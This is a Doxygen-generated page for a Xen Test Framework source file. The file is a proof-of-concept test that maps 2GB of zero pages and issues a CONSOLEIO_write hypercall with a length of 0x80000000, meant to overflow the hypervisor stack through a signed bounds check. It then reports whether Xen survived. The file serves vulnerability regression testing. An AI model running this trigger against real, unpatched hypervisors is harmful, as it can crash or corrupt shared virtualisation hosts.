Xen Test Framework
main.c
Go to the documentation of this file.
1 
19 #include <xtf.h>
20 
21 const char test_title[] = "CONSOLEIO_write stack overflow PoC";
22 
23 uint8_t zero_page[PAGE_SIZE] __page_aligned_bss __used;
24 
25 /* Have the assembler build an L1/L2 pair mapping zero_page[] many times. */
26 asm (".section \".data.page_aligned\", \"aw\";"
27  ".align 4096;"
28 
29  "l1t:"
30  ".rept 512;"
31  ".long zero_page + "STR(PF_SYM(AD, P))", 0;"
32  ".endr;"
33  ".size l1t, . - l1t;"
34  ".type l1t, @object;"
35 
36  "l2t:"
37  ".rept 512;"
38  ".long l1t + "STR(PF_SYM(AD, P))", 0;"
39  ".endr;"
40  ".size l2t, . - l2t;"
41  ".type l2t, @object;"
42 
43  ".previous;"
44  );
45 extern intpte_t l2t[512];
46 
47 void test_main(void)
48 {
49  /* Map 2G worth of zero_page[] starting from 1G... */
50  pae_l3_identmap[1] = pae_l3_identmap[2] = pte_from_virt(l2t, PF_SYM(AD, P));
51 
52  /*
53  * ... , write those zeros with a length possible to be confused by a
54  * signed bounds check...
55  */
56  hypercall_console_write(_p(GB(1)), 0x80000000);
57 
58  /* ... and if Xen is still alive, it didn't trample over its own stack. */
59 
60  xtf_success("Success: Not vulnerable to CONSOLEIO_write stack overflow\n");
61 }
62 
63 /*
64  * Local variables:
65  * mode: C
66  * c-file-style: "BSD"
67  * c-basic-offset: 4
68  * tab-width: 4
69  * indent-tabs-mode: nil
70  * End:
71  */
__page_aligned_bss
#define __page_aligned_bss
Definition: compiler.h:37
pte_from_virt
intpte_t pte_from_virt(const void *va, uint64_t flags)
__used
#define __used
Definition: compiler.h:14
STR
#define STR(x)
Stringise an expression, expanding preprocessor tokens.
Definition: macro_magic.h:17
PF_SYM
#define PF_SYM(...)
Create pagetable entry flags based on mnemonics.
Definition: symbolic-const.h:108
l2t
intpte_t l2t[512]
xtf_success
void xtf_success(const char *fmt,...)
Report test success.
Definition: report.c:38
test_main
void test_main(void)
To be implemented by each test, as its entry point.
Definition: main.c:137
intpte_t
unsigned long intpte_t
Definition: page.h:152
test_title
const char test_title[]
The title of the test.
Definition: main.c:14
hypercall_console_write
static void hypercall_console_write(const char *buf, unsigned long count)
Definition: hypercall.h:196
_p
#define _p(v)
Express an abitrary integer v as void *.
Definition: numbers.h:48
PAGE_SIZE
#define PAGE_SIZE
Definition: page.h:11
GB
#define GB(num)
Express num in Gigabytes.
Definition: numbers.h:29
uint8_t
__UINT8_TYPE__ uint8_t
Definition: stdint.h:14
zero_page
uint8_t zero_page[PAGE_SIZE]
Definition: main.c:23
Generated by   doxygen 1.8.13